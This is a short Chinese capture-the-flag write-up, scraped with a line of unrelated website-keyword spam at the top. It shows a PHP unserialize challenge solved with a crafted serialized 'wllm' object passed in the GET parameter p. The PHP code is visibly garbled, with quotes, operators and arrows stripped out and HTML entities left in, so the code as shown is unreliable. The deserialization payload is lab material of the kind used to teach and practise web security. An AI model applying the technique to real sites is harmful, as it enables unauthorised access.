新开传奇网站合击,做电脑系统哪个网站,企业网站模板库,关于做服饰网站的首页打开题目
查看源代码 得到提示#xff0c;那我们用御剑扫描一下看看 我们知道有个robots.txt#xff0c;访问一下得到 那我们便访问一下 cl45s.php看看
得到网站源代码 ?phperror_reporting(0);
show_source(cl45s.php);class wllm{public $admin;public …打开题目
查看源代码 得到提示那我们用御剑扫描一下看看 我们知道有个robots.txt访问一下得到 那我们便访问一下 cl45s.php看看
得到网站源代码 ?phperror_reporting(0);
show_source(cl45s.php);class wllm{public $admin;public $passwd;public function __construct(){$this-admin user;$this-passwd 123456;}public function __destruct(){if($this-admin admin $this-passwd ctf){include(flag.php);echo $flag;}else{echo $this-admin;echo $this-passwd;echo Just a bit more!;}}
}$p $_GET[p];
unserialize($p);?
如果我们adminadminpasswordctf则输出flag其中对我们get传入的p进行了反序列化操作
O:4:wllm:2:{s:5:admin;s:5:admin;s:6:passwd;s:3:ctf;}
得到flag
